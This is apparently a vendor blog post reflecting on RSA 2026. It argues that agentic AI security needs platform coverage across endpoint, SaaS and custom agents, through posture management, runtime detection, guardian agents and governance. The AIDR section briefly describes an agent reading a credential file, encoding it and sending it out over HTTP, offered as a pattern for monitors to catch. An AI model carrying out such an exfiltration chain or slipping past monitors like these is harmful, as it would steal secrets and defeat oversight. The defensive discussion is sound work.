
The hype is deafening, the booths were packed, but most of what the industry is calling "agentic AI security" is point products wearing platform clothes. Here is what the real thing requires.
RSA 2026 made one thing abundantly clear. Agentic AI security is the hottest category in cybersecurity right now, and almost everyone is rushing to claim a piece of it. Walking the expo floor, it felt like every other booth had some variation of "agentic AI security" in the messaging. But when you got past the banners and into the demos, a familiar pattern emerged. Most of what is being sold is not comprehensive agentic AI security. It is existing products with an agentic label bolted on top, or narrow point solutions that cover one slice of the problem while ignoring the rest.
I have been writing about this space for months. In my recent article, Governing Agentic AI, I covered the governance frameworks that do not account for autonomous agents, and in my recent breakdown of the UK AISI's research on 177,000 MCP tools, I highlighted the empirical data showing that agents are shifting rapidly from passive tools to active participants that modify environments, execute code, and interact with critical systems.
RSA reinforced every one of these themes.
The demand signal is there, the buyer intent is real, but the market is fragmented, and security leaders need to understand what comprehensive coverage actually requires before they start writing checks.
The Point Product Problem Is Back
If you have been in cybersecurity for more than a few years, you have seen this movie before. A new category emerges. Dozens of vendors rush in with narrow solutions. CISOs end up with a dozen tools that each solve 15% of the problem. Budgets bloat, integration becomes a nightmare, and eventually the market consolidates around platforms that do what the point products could not do individually.
We are watching the exact same pattern unfold with agentic AI security. A significant share of the vendors I saw at RSA are building solutions focused almost exclusively on one deployment pattern, typically endpoint coding agents. They can monitor what Cursor, Claude Code, or GitHub Copilot is doing on a developer's machine. That is genuinely valuable, but it is one-third of the problem at best.
As I have written about extensively, there are three major agent deployment patterns that enterprises need to secure.
- Endpoint agents, such as coding assistants and agentic browsers.
- SaaS and embedded agents that come bundled inside the enterprise platforms organizations already use, from CRMs to HR tools to collaboration suites
- Homegrown or custom agents that organizations build internally for their own workflows and use cases in cloud environments such as AWS, Azure, and GCP
Most of the point solutions I encountered at RSA cover one, maybe two of these patterns. Very few can see across all three, which is not a minor gap. It is the difference between having visibility into a fraction of your agent exposure and having a comprehensive picture. A CISO buying an endpoint-only agent security tool is in the same position as a CISO who bought a CASB in 2016 and thought they had "cloud security,” it is a piece, not the puzzle.
The practical implications for security leaders are significant. If you deploy a point solution for endpoint agents, you still have no visibility into the SaaS agents embedded in your Salesforce, ServiceNow, or Microsoft 365 environments. You have no coverage for the custom agents your engineering team is building internally, and you have no unified governance layer that spans all three deployment patterns with consistent policy enforcement.
That means separate tools, separate dashboards, separate policy engines, and the same tool sprawl and integration challenges that have plagued cybersecurity for decades.
Adjacent Categories Are Claiming Territory They Cannot Hold
The other pattern I saw across RSA was existing vendors from adjacent security categories rebranding their capabilities as "agentic AI security."
DSPM vendors are claiming agent security because agents touch data. NHI vendors are claiming it because agents use non-human identities. Endpoint security vendors are claiming it because some agents run on endpoints. Cloud security vendors are claiming it because agents deploy in cloud environments. IAM vendors are claiming identity is the new perimeter for agentic systems.
Each of these categories provides genuinely relevant context. I am not dismissing any of them. But every single one of them sees agents through the narrow lens of their existing product architecture, which misses the majority of what makes agent security different.
EDR vendors can see endpoint agents, but are blind to SaaS and embedded agents running in third-party platforms, and are blind to custom agents running in cloud environments.
CNAPP and cloud security vendors can see agents deployed in cloud infrastructure, but miss endpoint agents running on developer machines and embedded agents operating inside SaaS applications.
DSPM vendors can track sensitive data flows, but lack the ability to monitor agent tool usage, action chains, or behavioral patterns at runtime.
NHI vendors can manage the identities and credentials agents use, but do not have runtime visibility into what agents are actually doing with those credentials, which tools they are calling, the actions they are taking, or whether their behavior aligns with the intended use.
This is not a theoretical gap. It is the same fragmentation problem the cloud security market had a decade ago, when organizations were juggling CSPM for posture, CWPP for workload protection, CIEM for entitlements, and KIEM for Kubernetes. Each tool addressed a real problem, but none provided comprehensive coverage on its own.
The market eventually recognized this and consolidated around CNAPP, which coupled build-time and runtime coverage into a unified platform with catchphrases such as “from code to cloud”. Agentic AI security is headed down the same path, and security leaders who learn from the cloud security experience will avoid repeating the same expensive mistakes.
Identity Is Critical Context, Not the Whole Answer
I want to spend some time on the identity argument, specifically because it was one of the loudest claims at RSA. Several vendors, particularly those in the NHI and IAM space, made the case that identity is the perimeter for agentic AI systems. The argument goes that if you control the agent’s identity, credentials, and access policies, you control the risk.
There is truth in this: identity is essential context for agent security. Agents authenticate, use credentials, assume roles, and interact with systems under specific identity constructs. Understanding which agent is doing what under which identity is a foundational requirement. I am not arguing that identity does not matter. It matters a great deal and is a key signal we should incorporate from a risk perspective.
But identity is one signal among many, not the full picture. Knowing that Agent X has credentials to access System Y tells you about access. It does not tell you whether Agent X is behaving as intended, whether its actions align with the user's actual goals, whether it is being manipulated through prompt injection, whether it is taking actions that are technically within its permissions but contextually inappropriate, or whether it is chaining tool calls in ways that create emergent risks that no single permission check would catch.
Comprehensive agent security requires identity context layered with data sensitivity context, business criticality context, reachability analysis, runtime behavioral monitoring, tool usage patterns, and intent analysis. Just as CVSS scores alone are insufficient for vulnerability prioritization, identity alone is insufficient for agent risk assessment. You need the full picture.
The NHI and IAM vendors that are claiming comprehensive agent security coverage are, in most cases, providing valuable identity governance for agents while missing runtime visibility across all deployment environments, inline enforcement capabilities, behavioral analysis, intent monitoring, and the hard boundaries needed to prevent agents from taking destructive or unauthorized actions regardless of what their identity permits.
What Comprehensive Coverage Actually Requires
So what does the real thing look like? Based on my research, my work in this space, and conversations across RSA, I keep coming back to four pillars that any comprehensive platform needs to deliver across all three deployment patterns.
The first is visibility and observability. You cannot secure what you cannot see, and this remains the most fundamental for many enterprise organizations. A comprehensive platform needs to discover and inventory agents across endpoint, SaaS, and custom deployment environments. It needs to map what tools those agents have access to, what data they can reach, what actions they can take, what environments they operate in, and yes, what identities they’re associated with. The UK AISI research showing that agent tooling grew from roughly 5,000 to 177,000 tools in just over a year shows you how quickly this inventory is expanding. Without continuous discovery and visibility, every other security control is built on an incomplete foundation.
The second is AI Security Posture Management, or AISPM. This is the build-time and configuration layer. AISPM continuously assesses the security posture of agent deployments, evaluating trust boundaries, tool permissions, data access policies, identity configurations, and architectural decisions that determine the agent's risk profile before it ever takes an action. Think of it as the equivalent of CSPM for agents, but informed by the lesson that static posture alone is not enough. AISPM catches misconfigurations, overly permissive tool access, and policy violations at the design and deployment layer, before they become runtime incidents.
The third is AI Detection and Response, or AIDR. This is the runtime layer, where the most critical gaps exist today. AIDR monitors agent behavior in real time, detecting anomalous action patterns, policy violations, prompt injection attempts, and behavioral drift that indicate an agent is operating outside its intended boundaries. This is where capabilities like intent analysis become essential. Intent analysis examines the full context of an agent's action chain, not just individual actions in isolation, to determine whether the agent's behavior aligns with what the user actually asked it to do. A single API call might look benign in isolation. A chain of tool calls that reads a credential file, encodes its contents, and sends an outbound HTTP request tells a very different story. AIDR needs to see and reason about these multi-step patterns in real time.
This is also where inline enforcement, hard boundaries, and guardian agents come into play. Inline enforcement means the security platform can intervene in the agent's execution flow and block actions before they execute, not just alert after the fact. Hard boundaries are deterministic controls that cannot be bypassed, regardless of what the agent's LLM generates. If an agent should never be able to delete production databases, execute financial transactions above a threshold, or exfiltrate data to external endpoints, those boundaries need to be enforced programmatically, not probabilistically. Both are needed, but hard boundaries provide the floor that probabilistic systems cannot guarantee.
Guardian agents take this a step further. Rather than relying solely on static rules or classifiers, guardian agents are purpose-built AI agents whose sole job is to monitor other agents, evaluate their actions against policy, and intervene when behavior deviates from expected patterns. They bring the adaptability of AI-based reasoning to the enforcement layer while operating under tightly constrained policies that define what they can and cannot do. Think of them as a security-specific agent that watches your business agents the way a SOC analyst watches network traffic, but at machine speed and across every deployment environment.
The fourth pillar is governance. This is the policy, compliance, and accountability layer that ties everything together. Governance for agents needs to account for the unique properties that make agents different from traditional software or standalone models, including their autonomy, tool access, memory persistence, data sensitivity, and action capabilities. A comprehensive platform needs to enforce governance policies consistently across all three deployment patterns, map agent capabilities to organizational risk tolerance, and provide the audit trails and compliance evidence that regulators and boards increasingly require.
Lessons from Cloud Security the Market Needs to Learn
The parallels between where agentic AI security is today and where cloud security was a decade ago are striking. The cloud security market went through the exact same fragmentation, with CSPM, CWPP, CIEM, and other point categories each solving a piece of the puzzle. CISOs bought multiple tools, struggled with integration, and eventually demanded platforms that unified posture management and runtime protection. CNAPP emerged as the consolidation point, and the vendors that got there first won the market.
Agentic AI security is on the same trajectory, potentially moving even faster. The organizations that buy point solutions today will be consolidating onto platforms within 18 to 24 months. The vendors that build comprehensive coverage across all three deployment patterns, spanning visibility through governance with genuine runtime capabilities, will define the category. The ones that bolt an "agentic" label onto an existing DSPM, NHI, or endpoint product will get absorbed or left behind.
For CISOs evaluating vendors in this space right now, the questions that matter are straightforward. Can this platform see agents across endpoint, SaaS, and custom deployments? Does it provide both build-time posture management and runtime detection and response? Can it enforce hard boundaries and inline controls, or does it only alert after the fact? Does it reduce tool sprawl, or does it add another dashboard to the stack? And critically, does it view agents as unified constructs with identity, tools, data access, memory, and autonomous action capabilities, or does it see them only through the lens of a single adjacent category?
The Bottom Line
RSA 2026 confirmed that agentic AI security has arrived as a market category. The demand is real, the budgets are moving, and every vendor wants a piece. But the gap between what the market is selling and what enterprises actually need is significant. Most of what is available today is point products, adjacent category expansions, or single-deployment-pattern solutions that leave major blind spots.
Comprehensive agentic AI security requires visibility across all deployment patterns, posture management at build time, detection and response at runtime, and governance that accounts for what makes agents fundamentally different. It requires inline enforcement, hard boundaries, intent analysis, and the ability to see and reason about agent behavior in real time. And it requires learning from the cloud security playbook rather than repeating the same fragmentation mistakes that cost the industry years of sprawl and consolidation pain.
The organizations that demand platform-level coverage now will be the ones that deploy agents at scale with confidence. The ones that settle for point solutions will spend the next two years stitching together tools that were never designed to work together. We have seen this movie before, but it remains to be seen whether the industry learns from the last time it played.
Read Zenity’s full series of RSA 2026 blogs:
- My First RSA: Agents, Challenges, and Community
- RSA and DC Dispatches: Agentic AI Security Is the Story, Government Policy Needs to Catch Up
- Context Engineering Is Security Engineering. RSA 2026 Made the Case.
- The Floor Was Selling AI. The Hallways Were Asking for Help.
- Identity Isn’t Enough: Why AI Agent Security Requires Runtime Context
Related blog posts

Identity Isn’t Enough: Why AI Agent Security Requires Runtime Context
Conversations at RSA 2026 circled back to the same topic: identity is the foundation of AI agent security. While...

The Floor Was Selling AI. The Hallways Were Asking for Help.
One man’s perspective on RSA 2026 and what the AI agent security market actually looks like up close. Every year...

Context Engineering Is Security Engineering. RSA 2026 Made the Case.
The Model Isn't the Problem Anymore Cisco polled its major enterprise customers before RSA 2026 and found something...
Secure Your Agents
We’d love to chat with you about how your team can secure and govern AI Agents everywhere.
Get a Demo